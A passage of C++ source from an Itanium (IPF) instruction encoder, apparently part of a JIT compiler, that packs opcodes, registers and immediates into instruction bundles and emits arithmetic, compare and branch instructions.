encode(x6, 35, 30);
encode(hint, 29, 28);
encode(x, 27, 27);
return emit();
}
unsigned Opcode_Encoder_offset9::M3_M5_M8_M10_M15(unsigned opcode, unsigned x6, unsigned hint)
{
encode(opcode, 40, 37);
encode(x6, 35, 30);
encode(hint, 29, 28);
return emit();
}
unsigned Opcode_Encoder_offset9::M18_M19(unsigned opcode, unsigned m, unsigned x6, unsigned x)
{
encode(opcode, 40, 37);
encode(m, 36, 36);
encode(x6, 35, 30);
encode(x, 27, 27);
return emit();
}
unsigned Opcode_Encoder_offset9::M20_M21_M22_M23_M34(unsigned opcode, unsigned x3)
{
encode(opcode, 40, 37);
encode(x3, 35, 33);
return emit();
}
unsigned Opcode_Encoder_offset9::F1_F2_F3(unsigned opcode, unsigned x, unsigned sf_x2)
{
encode(opcode, 40, 37);
encode(x, 36, 36);
encode(sf_x2, 35, 34);
return emit();
}
unsigned Opcode_Encoder_offset9::F4(unsigned opcode, unsigned rb, unsigned sf, unsigned ra, unsigned ta)
{
encode(opcode, 40, 37);
encode(rb, 36, 36);
encode(sf, 35, 34);
encode(ra, 33, 33);
encode(ta, 12, 12);
return emit();
}
unsigned Opcode_Encoder_offset9::F5(unsigned opcode, unsigned fc2, unsigned fclass7c, unsigned ta)
{
encode(opcode, 40, 37);
encode(fc2, 34, 33);
encode(fclass7c, 26, 20);
encode(ta, 12, 12);
return emit();
}
unsigned Opcode_Encoder_offset9::F6(unsigned opcode, unsigned q, unsigned sf, unsigned x)
{
encode(opcode, 40, 37);
encode(q, 36, 36);
encode(sf, 35, 34);
encode(x, 33, 33);
return emit();
}
unsigned Opcode_Encoder_offset9::F8_F9_F10_F11_F12_F13(unsigned opcode, unsigned x, unsigned x6, unsigned sf)
{
encode(opcode, 40, 37);
encode(sf, 35, 34);
encode(x, 33, 33);
encode(x6, 32, 27);
return emit();
}
unsigned Register_Encoder_offset6::R3_R2_R1(unsigned r3, unsigned r2, unsigned r1)
{
encode(r3, 26, 20);
encode(r2, 19, 13);
encode(r1, 12, 6);
return emit();
}
unsigned Register_Encoder_offset6::R3_R1(unsigned r3, unsigned r1)
{
encode(r3, 26, 20);
encode(r1, 12, 6);
return emit();
}
unsigned Register_Encoder_offset6::R2_R1(unsigned r2, unsigned r1)
{
encode(r2, 19, 13);
encode(r1, 12, 6);
return emit();
}
unsigned Register_Encoder_offset6::R3_R2(unsigned r3, unsigned r2)
{
encode(r3, 26, 20);
encode(r2, 19, 13);
return emit();
}
unsigned Register_Encoder_offset6::cR3_R1(unsigned r3, unsigned r1)
{
encode(r3, 21, 20);
encode(r1, 12, 6);
return emit();
}
unsigned Register_Encoder_offset6::R1(unsigned r1)
{
encode(r1, 12, 6);
return emit();
}
unsigned Register_Encoder_offset6::R2(unsigned r2)
{
encode(r2, 19, 13);
return emit();
}
unsigned Register_Encoder_offset6::R3(unsigned r3)
{
encode(r3,26,20);
return emit();
}
unsigned Register_Encoder_offset6::P2_P1_R3_R2(unsigned p2, unsigned p1, unsigned r3, unsigned r2)
{
encode(p2, 32, 27);
encode(p1, 11, 6);
encode(r3, 26, 20);
encode(r2, 19, 13);
return emit();
}
unsigned Register_Encoder_offset6::P2_P1_R3(unsigned p2, unsigned p1, unsigned r3)
{
encode(p2, 32, 27);
encode(p1, 11, 6);
encode(r3, 26, 20);
return emit();
}
unsigned Register_Encoder_offset6::B2_B1(unsigned b2, unsigned b1)
{
encode(b2, 15, 13);
encode(b1, 8, 6);
return emit();
}
unsigned Register_Encoder_offset6::B1(unsigned b1)
{
encode(b1, 8, 6);
return emit();
}
unsigned Register_Encoder_offset6::I20_M20_M21(unsigned r2) {
encode(r2,19,13);
return emit();
}
unsigned Register_Encoder_offset6::F4_F3_F2_F1(unsigned f4, unsigned f3, unsigned f2, unsigned f1)
{
encode(f4, 33, 27);
encode(f3, 26, 20);
encode(f2, 19, 13);
encode(f1, 12, 6);
return emit();
}
unsigned Register_Encoder_offset6::P2_P1_F3_F2(unsigned p2, unsigned p1, unsigned f3, unsigned f2)
{
encode(p2, 32, 27);
encode(p1, 11, 6);
encode(f3, 26, 20);
encode(f2, 19, 13);
return emit();
}
unsigned Register_Encoder_offset6::P2_P1_F2(unsigned p2, unsigned p1, unsigned f2)
{
encode(p2, 32, 27);
encode(p1, 11, 6);
encode(f2, 19, 13);
return emit();
}
unsigned Register_Encoder_offset6::F3_F2_F1(unsigned f3, unsigned f2, unsigned f1)
{
encode(f3, 26, 20);
encode(f2, 19, 13);
encode(f1, 12, 6);
return emit();
}
unsigned Register_Encoder_offset6::P2_F3_F2_F1(unsigned p2, unsigned f3, unsigned f2, unsigned f1)
{
encode(p2, 32, 27);
encode(f3, 26, 20);
encode(f2, 19, 13);
encode(f1, 12, 6);
return emit();
}
unsigned Register_Encoder_offset6::F2_F1(unsigned f2, unsigned f1)
{
encode(f2, 19, 13);
encode(f1, 12, 6);
return emit();
}
unsigned Register_Encoder_offset6::B2_R1(unsigned b2, unsigned r1)
{
encode(b2, 15, 13);
encode(r1, 12, 6);
return emit();
}
unsigned Register_Encoder_offset6::R2_B1(unsigned r2, unsigned b1)
{
encode(r2, 19, 13);
encode(b1, 8, 6);
return emit();
}
unsigned Immediate_Encoder_offset6::A2(unsigned count2)
{
// count2 = ct2d + 1
encode(count2 - 1, 28, 27);
return emit();
}
unsigned Immediate_Encoder_offset6::A3_A8_I27_M30(unsigned imm8)
{
// imm8 = sign_ext(s<<7 | imm7b, 8)
encode((0x80 & imm8) >> 7, 36, 36);
encode((0x7F & imm8), 19, 13);
return emit();
}
unsigned Immediate_Encoder_offset6::A4(unsigned imm14)
{
// imm14 = sign_ext(s<<13 | imm6d<<7 | imm7b, 14)
encode((0x2000 & imm14) >> 13, 36, 36);
encode((0x1F80 & imm14) >> 7, 32, 27);
encode((0x7F & imm14), 19, 13);
return emit();
}
unsigned Immediate_Encoder_offset6::A5(unsigned imm22)
{
// imm22 = sign_ext(s<<21 | imm5c<<16 | imm9d<<7 | imm7b, 22)
encode((0x200000 & imm22) >> 21, 36, 36);
encode((0x1F0000 & imm22) >> 16, 26, 22);
encode((0xFF80 & imm22) >> 7, 35, 27);
encode((0x7F & imm22), 19, 13);
return emit();
}
unsigned Immediate_Encoder_offset6::I6(unsigned count5)
{
// count5 = count5b
encode(count5, 18, 14);
return emit();
}
unsigned Immediate_Encoder_offset6::I8(unsigned count5)
{
// count5 = 31 - ccount5c
encode(31-count5, 24, 20);
return emit();
}
unsigned Immediate_Encoder_offset6::I10(unsigned count6)
{
// count6 = count6d
encode(count6, 32, 27);
return emit();
}
unsigned Immediate_Encoder_offset6::I11(unsigned len6, unsigned pos6)
{
// len6 = len6d + 1
// pos6 = pos6b
encode(len6 - 1, 32, 27);
encode(pos6, 19, 14);
return emit();
}
unsigned Immediate_Encoder_offset6::I12(unsigned len6, unsigned pos6)
{
// len6 = len6d + 1
// pos6 = 63 - cpos6c
encode(len6 - 1, 32, 27);
encode(63 - pos6, 25, 20);
return emit();
}
unsigned Immediate_Encoder_offset6::I13(unsigned len6, unsigned pos6, unsigned imm8)
{
// len6 = len6d + 1
// pos6 = 63 - cpos6c
// imm8 = sign_ext(s<<7|imm7b,8)
encode(len6 - 1, 32, 27);
encode(63 - pos6, 25, 20);
encode((0x80 & imm8) >> 7, 36, 36);
encode((0x7F & imm8), 19, 13);
return emit();
}
unsigned Immediate_Encoder_offset6::I14(unsigned len6, unsigned pos6, unsigned imm1)
{
// len6 = len6d + 1
// pos6 = 63 - cpos6b
// imm1 = sign_ext(s,1)
encode(len6 - 1, 32, 27);
encode(63 - pos6, 19, 14);
encode(0x1 & imm1, 36, 36);
return emit();
}
unsigned Immediate_Encoder_offset6::I15(unsigned len4, unsigned pos6)
{
// len4 = len4d + 1
// pos6 = 63 - cpos6d
encode(len4 - 1, 30, 27);
encode(63 - pos6, 36, 31);
return emit();
}
unsigned Immediate_Encoder_offset6::I18(unsigned upper_32, unsigned lower_32)
{
// imm64 = i << 63 | imm41<<22 | ic<<21 | imm5c<<16 | imm9d<<7 | imm7b
encode((0x80000000 & upper_32) >> 31, 36, 36);
encode((0x200000 & lower_32) >> 21, 21, 21);
encode((0x1F0000 & lower_32) >> 16, 26, 22);
encode((0xFF80 & lower_32) >> 7, 35, 27);
encode((0x7F & lower_32), 19, 13);
return emit();
}
unsigned Immediate_Encoder_offset6::I21(unsigned tag13, unsigned IP)
{
// tag13 = IP + (sign_ext(timm9c, 9) << 4)
unsigned imm9 = (tag13-IP) >> 4;
encode((0x1FF & imm9), 32, 24);
return emit();
}
unsigned Immediate_Encoder_offset6::I23(unsigned mask17)
{
// mask17 = sign_ext(s<<16 | mask8c<<8 | mask7a<<1, 17)
encode((0x10000 & mask17) >> 16, 36, 36);
encode((0xFF00 & mask17) >> 8, 31, 24);
encode((0x00FE & mask17) >> 1, 12, 6);
return emit();
}
unsigned Immediate_Encoder_offset6::I24(unsigned imm28)
{
// imm44 = imm28 << 16
// imm44 = sign_ext(s<<43 | imm27a <<16, 44)
encode((0x8000000 & imm28) >> 27, 36, 36);
encode((0x7FFFFFF & imm28), 32, 6);
return emit();
}
unsigned Immediate_Encoder_offset6::M3_M8_M15(unsigned imm9)
{
// imm9 = sign_ext(s<<8 | i<<7 | imm7b, 9)
encode((0x100 & imm9) >> 8, 36, 36);
encode((0x80 & imm9) >> 7, 27, 27);
encode((0x7F & imm9), 19, 13);
return emit();
}
unsigned Immediate_Encoder_offset6::M5_M10(unsigned imm9)
{
// imm9 = sign_ext(s<<8 | i<<7 | imm7a, 9)
encode((0x100 & imm9) >> 8, 36, 36);
encode((0x80 & imm9)>> 7, 27, 27);
encode((0x7F & imm9), 12, 6);
return emit();
}
unsigned Immediate_Encoder_offset6::M34(unsigned il, unsigned o, unsigned r)
{
// il = sol
// o = sof - sol
// r = sor << 3
encode(il, 26, 20);
encode(il+o, 19, 13);
encode(r >> 3, 30, 27);
return emit();
}
unsigned Immediate_Encoder_offset6::B1_B2_B3(unsigned target25, unsigned IP)
{
// target25 = IP + (sign_ext(s<<20 | imm20b, 21) << 4)
unsigned imm21 = (target25-IP) >> 4;
encode((0x100000 & imm21) >> 20, 36, 36);
encode((0xFFFFF & imm21), 32, 13);
return emit();
}
unsigned Immediate_Encoder_offset6::I20_M20_M21(unsigned target25, unsigned IP)
{
unsigned imm21 = (target25-IP) >> 4;
encode ((0x100000 & imm21) >> 20, 36, 36);
encode ((0x0fff80 & imm21) >> 7, 32, 20);
encode ((0x00007f & imm21), 12, 6);
return emit();
}
unsigned Immediate_Encoder_offset6::I19_M37_B9_F15(unsigned imm21)
{
// imm21 = i << 20 | imm20a
encode((0x100000 & imm21) >> 20, 36, 36);
encode((0xFFFFF & imm21), 25, 6);
return emit();
}
void Merced_Encoder::encode(unsigned opcode9, unsigned imm6, unsigned reg6, unsigned qp)
{
assert(slot_num < 3);
slot_encode(slot_num, opcode9, 9, 32); // 40:9
slot_encode(slot_num, imm6, 6, 31); // 36:6
slot_encode(slot_num, reg6, 6, 28); // 33:6
slot_encode(slot_num, qp, 0, 6); // qp, default to 0
slot_num++;
}
void Merced_Encoder::encode_long(unsigned opcode9, unsigned imm6, unsigned imm31x, unsigned imm10x,
unsigned reg6, unsigned qp)
{
assert(slot_num < 2);
slot_encode(slot_num+1, opcode9, 9, 32); // 40:9
slot_encode(slot_num+1, imm6, 6, 31); // 36:6
slot_encode(slot_num+1, reg6, 6, 27); // 32:6
slot_encode(slot_num+1, qp, 0, 6); // qp, default to 0
slot_encode(slot_num, imm31x, 10, 31);
slot_encode(slot_num, imm10x, 0, 10);
slot_num += 2;
}
// The section numbers below (x.x.x.x and x.x.x) are reffering to the Intel
// Itanium Architecture Software Developer's Manual, volume 3, revision 2.1,
// October 2002.
void Merced_Encoder::encode_long_X3_X4(unsigned opcode4,
Branch_Prefetch_Hint ph,
Branch_Whether_Hint wh,
Branch_Dealloc_Hint dh,
unsigned b,
unsigned i,
uint64 imm39,
unsigned imm20b,
unsigned qp)
{ // 4.7.3
assert(slot_num < 2);
int slot1 = slot_num + 1;
int slot2 = slot_num;
slot_encode(slot1, opcode4, 37, 4); // 37..40
slot_encode(slot1, i, 36, 1); // 36..36
slot_encode(slot1, dh, 35, 1); // 35..35
slot_encode(slot1, wh, 33, 2); // 33..34
slot_encode(slot1, imm20b, 13, 20); // 13..32
slot_encode(slot1, ph, 12, 1); // 12..12
slot_encode(slot1, b, 6, 3); // 6..8
slot_encode(slot1, qp, 0, 6); // qp
// Encode imm39 in two chunks since slot_encode can't take a 64-bit
// cnstant as an argument.
slot_encode(slot2, (unsigned)((imm39 >> 19) & 0xFffFF), 21, 20);
slot_encode(slot2, (unsigned)(imm39 & 0x7ffFF), 2, 19);
slot_num += 2;
} //Merced_Encoder::encode_long_X3_X4
void Merced_Encoder::ipf_nop(EM_Syllable_Type tv, unsigned imm21)
{
assert(imm21 < 1u<<21);
switch (tv)
{
case ST_m:
encode( // 4.4.9.4
opc_enc.M24_M25_M26_M37(0, 0, 1, 0),
imm_enc.I19_M37_B9_F15(imm21),
0
);
break;
case ST_i:
encode( // 4.4.9.4
opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(0, 0, 1),
imm_enc.I19_M37_B9_F15(imm21),
0
);
break;
case ST_f:
encode( // 4.6.9.1
opc_enc.F15(0, 0, 1),
imm_enc.I19_M37_B9_F15(imm21),
0
);
break;
case ST_b:
encode( // 4.5.3.2
opc_enc.B8_B9(2, 0),
imm_enc.I19_M37_B9_F15(imm21),
0
);
break;
default:
assert(0);
}
}
void Merced_Encoder::ipf_add(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
encode( // 4.2.1.1
opc_enc.A1_A2_A3_A4(8, 0, 0, 0, 0),
0,
reg_enc.R3_R2_R1(src2, src1, dest),
pred
);
}
void Merced_Encoder::ipf_sub(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
encode( // 4.2.1.1
opc_enc.A1_A2_A3_A4(8, 0, 0, 1, 1),
0,
reg_enc.R3_R2_R1(src2, src1, dest),
pred
);
}
void Merced_Encoder::ipf_addp4(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
encode( // 4.2.1.1
opc_enc.A1_A2_A3_A4(8, 0, 0, 2, 0),
0,
reg_enc.R3_R2_R1(src2, src1, dest),
pred
);
}
void Merced_Encoder::ipf_and(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
encode( // 4.2.1.1
opc_enc.A1_A2_A3_A4(8, 0, 0, 3, 0),
0,
reg_enc.R3_R2_R1(src2, src1, dest),
pred
);
}
void Merced_Encoder::ipf_or(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
encode( // 4.2.1.1
opc_enc.A1_A2_A3_A4(8, 0, 0, 3, 2),
0,
reg_enc.R3_R2_R1(src2, src1, dest),
pred
);
}
void Merced_Encoder::ipf_xor(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
encode( // 4.2.1.1
opc_enc.A1_A2_A3_A4(8, 0, 0, 3, 3),
0,
reg_enc.R3_R2_R1(src2, src1, dest),
pred
);
}
void Merced_Encoder::ipf_shladd(unsigned dest, unsigned src1, int count, unsigned src2, unsigned pred)
{
encode( // 4.2.1.2
opc_enc.A1_A2_A3_A4(8, 0, 0, 4),
imm_enc.A2(count),
reg_enc.R3_R2_R1(src2, src1, dest),
pred
);
}
void Merced_Encoder::ipf_subi(unsigned dest, int imm, unsigned src, unsigned pred)
{
encode( // 4.2.1.3
opc_enc.A1_A2_A3_A4(8, 0, 0, 9, 1),
imm_enc.A3_A8_I27_M30(imm),
reg_enc.R3_R1(src, dest),
pred
);
}
void Merced_Encoder::ipf_andi(unsigned dest, int imm, unsigned src, unsigned pred)
{
encode( // 4.2.1.3
opc_enc.A1_A2_A3_A4(8, 0, 0, 0xB, 0),
imm_enc.A3_A8_I27_M30(imm),
reg_enc.R3_R1(src, dest),
pred
);
}
void Merced_Encoder::ipf_ori(unsigned dest, int imm, unsigned src, unsigned pred)
{
encode( // 4.2.1.3
opc_enc.A1_A2_A3_A4(8, 0, 0, 0xB, 2),
imm_enc.A3_A8_I27_M30(imm),
reg_enc.R3_R1(src, dest),
pred
);
}
void Merced_Encoder::ipf_xori(unsigned dest, int imm, unsigned src, unsigned pred)
{
encode( // 4.2.1.3
opc_enc.A1_A2_A3_A4(8, 0, 0, 0xB, 3),
imm_enc.A3_A8_I27_M30(imm),
reg_enc.R3_R1(src, dest),
pred
);
}
void Merced_Encoder::ipf_adds(unsigned dest, int imm14, unsigned src, unsigned pred)
{
encode( // 4.2.1.3
opc_enc.A1_A2_A3_A4(8, 2, 0),
imm_enc.A4(imm14),
reg_enc.R3_R1(src, dest),
pred
);
}
void Merced_Encoder::ipf_addl(unsigned dest, int imm22, unsigned src, unsigned pred)
{
encode( // 4.2.1.3
opc_enc.A5_I15(9),
imm_enc.A5(imm22),
reg_enc.R3_R1(src, dest),
pred
);
}
void Merced_Encoder::ipf_addp4i(unsigned dest, int imm14, unsigned src, unsigned pred)
{
encode( // 4.2.1.3
opc_enc.A1_A2_A3_A4(8, 3, 0),
imm_enc.A4(imm14),
reg_enc.R3_R1(src, dest),
pred
);
}
void Merced_Encoder::ipf_cmp(Int_Comp_Rel xcr, Compare_Extension cx, unsigned xp1, unsigned xp2, unsigned xr2, unsigned xr3, bool cmp4, unsigned pred)
{
unsigned x2, tb = 0, ta = 0, c = 0;
unsigned opcode=0, p1=xp1, p2=xp2, r2=xr2, r3=xr3;
Int_Comp_Rel cr;
if (cx==cmp_none || cx==cmp_unc)
{
switch (xcr)
{ //switch predicates
case icmp_ne:
case icmp_ge:
case icmp_geu:
case icmp_le:
case icmp_leu:
p1 = xp2; p2 = xp1; break;
default: break;
}
switch (xcr)
{ // switch registers
case icmp_le:
case icmp_gt:
case icmp_leu:
case icmp_gtu:
r2 = xr3;
r3 = xr2;
break;
default: break;
}
switch (xcr)
{ // reassign cr
case icmp_lt:
case icmp_le:
case icmp_gt:
case icmp_ge:
cr = icmp_lt;
opcode = 0xC;
break;
case icmp_ltu:
case icmp_leu:
case icmp_gtu:
case icmp_geu:
cr = icmp_ltu;
opcode = 0xD;
break;
case icmp_eq:
case icmp_ne:
cr = icmp_eq;
opcode = 0xE;
break;
default:
assert(0); // compare type not covered
}
switch (cx)
{ // assign bits
case cmp_none:
tb = 0; ta = 0; c = 0; break;
case cmp_unc:
tb = 0; ta = 0; c = 1; break;
default:
assert(0);
}
}
else if (cx==cmp_and || cx==cmp_or || cx==cmp_or_andcm) // parallel compares
{
cr = xcr;
if (r3==0 && (xcr!=icmp_eq && xcr!=icmp_ne))
{ // if r3 is register 0 then switch
assert(r2!=0); // compare zero with zero?
switch (xcr)
{
case icmp_lt:
cr = icmp_gt;
break;
case icmp_le:
cr = icmp_ge;
break;
case icmp_gt:
cr = icmp_lt;
break;
case icmp_ge:
cr = icmp_le;
break;
default: assert(0);
}
// switch registers
r2 = xr3;
r3 = xr2;
}
switch (cx)
{ // assign opcode
case cmp_and:
opcode = 0xC;
break;
case cmp_or:
opcode = 0xD;
break;
case cmp_or_andcm:
opcode = 0xE;
break;
default:
assert(0); // compare type not covered
}
switch (cr)
{ // assign bits
case icmp_eq:
tb = 0; ta = 1; c = 0; break;
case icmp_ne:
tb = 0; ta = 1; c = 1; break;
case icmp_gt:
tb = 1; ta = 0; c = 0; break;
case icmp_le:
tb = 1; ta = 0; c = 1; break;
case icmp_ge:
tb = 1; ta = 1; c = 0; break;
case icmp_lt:
tb = 1; ta = 1; c = 1; break;
default:
assert(0);
}
}
else
assert(0);
if (cmp4)
x2 = 1;
else
x2 = 0;
assert(opcode);
encode( // 21.2.2
opc_enc.A6_A7(opcode, tb, x2, ta, c),
0,
reg_enc.P2_P1_R3_R2(p2, p1, r3, r2),
pred
);
}
void Merced_Encoder::ipf_cmpz(Int_Comp_Rel cr, Compare_Extension cx, unsigned xp1, unsigned xp2, unsigned r3, bool cmp4, unsigned pred)
{
ipf_cmp(cr, cx, xp1, xp2, 0, r3, cmp4, pred);
}
void Merced_Encoder::ipf_cmpi(Int_Comp_Rel xcr, Compare_Extension cx, unsigned xp1, unsigned xp2, int ximm, unsigned xr3, bool cmp4, unsigned pred)
{
unsigned x2, ta = 0, c = 0;
unsigned opcode=0, p1=xp1, p2=xp2, r3=xr3;
int imm = ximm;
Int_Comp_Rel cr;
if (cx==cmp_none || cx==cmp_unc)
{
switch (xcr)
{ //switch predicates
case icmp_ne:
case icmp_ge:
case icmp_geu:
case icmp_gt:
case icmp_gtu:
p1 = xp2; p2 = xp1;
break;
default:
break; // do nothing
}
switch (xcr)
{ // subtract 1 from the immediate
case icmp_le:
case icmp_gt:
case icmp_leu:
case icmp_gtu:
imm = ximm - 1;
break;
default:
break; // do nothing
}
switch (xcr)
{ // reassign cr
case icmp_lt:
case icmp_le:
case icmp_gt:
case icmp_ge:
cr = icmp_lt;
opcode = 0xC;
break;
case icmp_ltu:
case icmp_leu:
case icmp_gtu:
case icmp_geu:
cr = icmp_ltu;
opcode = 0xD;
break;
case icmp_eq:
case icmp_ne:
cr = icmp_eq;
opcode = 0xE;
break;
default:
assert(0); // compare type not covered
}
switch (cx)
{ // assign bits
case cmp_none:
ta = 0; c = 0; break;
case cmp_unc:
ta = 0; c = 1; break;
default:
assert(0);
}
}
else if (cx==cmp_and || cx==cmp_or || cx==cmp_or_andcm) // parallel compares
{
cr = xcr;
switch (cx)
{ // assign opcode
case cmp_and:
opcode = 0xC;
break;
case cmp_or:
opcode = 0xD;
break;
case cmp_or_andcm:
opcode = 0xE;
break;
default:
assert(0); // compare type not covered
}
switch (cr)
{ // assign bits
case icmp_eq:
ta = 1; c = 0; break;
case icmp_ne:
ta = 1; c = 1; break;
default:
assert(0);
}
}
else
assert(0);
if (cmp4)
x2 = 3;
else
x2 = 2;
assert(opcode);
encode( // 21.2.2.3
opc_enc.A8(opcode, x2, ta, c),
imm_enc.A3_A8_I27_M30((unsigned)imm),
reg_enc.P2_P1_R3(p2, p1, r3),
pred
);
}
void Merced_Encoder::ipf_movl(unsigned dest, unsigned upper_32, unsigned lower_32, unsigned pred)
{
encode_long( // 4.3.4
opc_enc.I18(6, 0),
imm_enc.I18(upper_32, lower_32),
(upper_32 & 0x7FFFFFFF),
(lower_32 & 0xFFC00000) >> 22,
reg_enc.R1(dest),
pred
);
}
void Merced_Encoder::ipf_brl_call(Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, unsigned b1, uint64 imm64, unsigned pred)
{
uint64 temp = imm64;
unsigned i;
uint64 imm39;
unsigned imm20b;
temp >>= 4; // ignore 4 least significant bits
imm20b = (unsigned)(temp & 0xfFfFf);
temp >>= 20;
imm39 = temp & 0x7fFFFFffff;
temp >>= 39;
i = (unsigned)(temp & 1);
temp >>= 1;
assert(temp == 0);
encode_long_X3_X4(0xd, ph, wh, dh, b1, i, imm39, imm20b, pred);
} //Merced_Encoder::ipf_brl_call
void Merced_Encoder::rewrite_brl_call_target(const unsigned char * oldBundle, uint64 newTarget) {
slot_num = 0;
for (int index = 0; index < IPF_INSTRUCTION_LEN; index++)
_char_value[index] = oldBundle[index];
newTarget >>= 4; // ignore 4 least significant bits
unsigned imm20b = (unsigned)(newTarget & 0xfFfFf);
newTarget >>= 20;
uint64 imm39 = newTarget & 0x7fFFFFffff;
newTarget >>= 39;
unsigned i = (unsigned)(newTarget & 1);
newTarget >>= 1;
assert(newTarget == 0);
int slot1 = 2;
int slot2 = 1;
// Encode i
slot_rewrite(slot1, i, 36, 1); // 36..36
// Encode imm20b
slot_rewrite(slot1, imm20b, 13, 20); // 13..32
// Encode imm39 in two chunks since slot_encode can't take a 64-bit
// cnstant as an argument.
slot_rewrite(slot2, (unsigned)((imm39 >> 19) & 0xFffFF), 21, 20);
slot_rewrite(slot2, (unsigned)(imm39 & 0x7ffFF), 2, 19);
}
void Merced_Encoder::ipf_brl_cond(Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, uint64 imm64, unsigned pred)
{
uint64 temp = imm64;
unsigned i;
uint64 imm39;
unsigned imm20b;
temp >>= 4; // ignore 4 least significant bits
imm20b = (unsigned)(temp & 0xfFfFf);
temp >>= 20;
imm39 = temp & 0x7fFFFFffff;
temp >>= 39;
i = (unsigned)(temp & 1);
temp >>= 1;
assert(temp == 0);
encode_long_X3_X4(0xC, ph, wh, dh, 0, i, imm39, imm20b, pred);
} //Merced_Encoder::ipf_brl_cond
void Merced_Encoder::ipf_shr(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
encode( // 4.3.1.5
opc_enc.I5_I7(7, 1, 0, 1, 0, 0, 2),
0,
reg_enc.R3_R2_R1(src1, src2, dest),
pred
);
}
void Merced_Encoder::ipf_shru(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
encode( // 4.3.1.5
opc_enc.I5_I7(7, 1, 0, 1, 0, 0, 0),
0,
reg_enc.R3_R2_R1(src1, src2, dest),
pred
);
}
void Merced_Encoder::ipf_shl(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
encode( // 4.3.1.7
opc_enc.I5_I7(7, 1, 0, 1, 0, 1, 0),
0,
reg_enc.R3_R2_R1(src2, src1, dest),
pred
);
}
void Merced_Encoder::ipf_extr(unsigned dest, unsigned src, int pos6, int len6, unsigned pred)
{
encode( // 4.3.2.2
opc_enc.I10_I11(5, 1, 0, 1),
imm_enc.I11(len6, pos6),
reg_enc.R3_R1(src, dest),
pred
);
}
void Merced_Encoder::ipf_extru(unsigned dest, unsigned src, int pos6, int len6, unsigned pred)
{
encode( // 4.3.2.2
opc_enc.I10_I11(5, 1, 0, 0),
imm_enc.I11(len6, pos6),
reg_enc.R3_R1(src, dest),
pred
);
}
void Merced_Encoder::ipf_depz(unsigned dest, unsigned src, int pos6, int len6, unsigned pred)
{
encode( // 4.3.2.3
opc_enc.I12_I13_I14(5, 1, 1, 0),
imm_enc.I12(len6, pos6),
reg_enc.R2_R1(src, dest),
pred
);
}
void Merced_Encoder::ipf_depiz(unsigned dest, int imm8, int pos6, int len6, unsigned pred)
{
encode( // 4.3.2.4
opc_enc.I12_I13_I14(5, 1, 1, 1),
imm_enc.I13(len6, pos6, imm8),
reg_enc.R1(dest),
pred
);
}
void Merced_Encoder::ipf_depi(unsigned dest, int imm1, unsigned src, int pos6, int len6, unsigned pred)
{
encode( // 4.3.2.5
opc_enc.I12_I13_I14(5, 3, 1),
imm_enc.I14(len6, pos6, imm1),
reg_enc.R3_R1(src, dest),
pred
);
}
void Merced_Encoder::ipf_dep(unsigned dest, unsigned r2, unsigned r3, int pos6, int len4, unsigned pred)
{
encode( // 4.3.2.6
opc_enc.A5_I15(4),
imm_enc.I15(len4, pos6),
reg_enc.R3_R2_R1(r3, r2, dest),
pred
);
}
void Merced_Encoder::ipf_sxt(Sxt_Size size, unsigned dest, unsigned src, unsigned pred)
{
encode( // 4.3.9
opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(0, 0, (0x14+size)), // 0x14, 0x15, 0x16
0,
reg_enc.R3_R1(src, dest),
pred
);
}
void Merced_Encoder::ipf_zxt(Sxt_Size size, unsigned dest, unsigned src, unsigned pred)
{
encode( // 4.3.9
opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(0, 0, (0x10+size)), // 0x10, 0x11, 0x12
0,
reg_enc.R3_R1(src, dest),
pred
);
}
/// ******** remember, for counted loop, must force qp = 0. See 4.5.1.2
void Merced_Encoder::ipf_br(Branch_Type btype, Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, unsigned target25, unsigned pred)
{
unsigned curr_ip = _offset;
encode( // 4.5.1.1 and 4.5.1.2
opc_enc.B1_B2_B3_B4_B5(4, dh, wh, ph),
imm_enc.B1_B2_B3(target25, curr_ip),
reg_enc.B1(btype), // btyte occupies the same space as b1, so be tricky
pred
);
}
void Merced_Encoder::ipf_brcall(Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, unsigned b1, unsigned target25, unsigned pred)
{
unsigned curr_ip = _offset;
encode( // 4.5.1.3
opc_enc.B1_B2_B3_B4_B5(5, dh, wh, ph),
imm_enc.B1_B2_B3(target25, curr_ip),
reg_enc.B1(b1),
pred
);
}
void Merced_Encoder::ipf_bri(Branch_Type btype, Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, unsigned b2, unsigned pred)
{
encode( // 4.5.1.4
opc_enc.B1_B2_B3_B4_B5(0, dh, wh, ph, 0x20),
0,
reg_enc.B2_B1(b2, btype),
pred
);
}
// specialized for return
void Merced_Encoder::ipf_brret(Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, unsigned b2, unsigned pred)
{
encode( // 4.5.1.4
opc_enc.B1_B2_B3_B4_B5(0, dh, wh, ph, 0x21),
0,
reg_enc.B2_B1(b2, 4),
pred
);
}
void Merced_Encoder::ipf_bricall(Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, unsigned b1, unsigned b2, unsigned pred)
{
encode( // 4.5.1.5
opc_enc.B1_B2_B3_B4_B5(1, dh, wh, ph),
0,
reg_enc.B2_B1(b2, b1),
pred
);
}
void Merced_Encoder::ipf_chk_s_i(unsigned src, unsigned target25, unsigned pred) {
unsigned curr_ip = _offset;
encode( // I20
opc_enc.I20_I23_I24_M20_M21(0,1),
imm_enc.I20_M20_M21(target25, curr_ip),
reg_enc.I20_M20_M21(src),
pred
);
}
void Merced_Encoder::ipf_chk_s_m(unsigned src, unsigned target25, unsigned pred) {
unsigned curr_ip = _offset;
encode( // M20
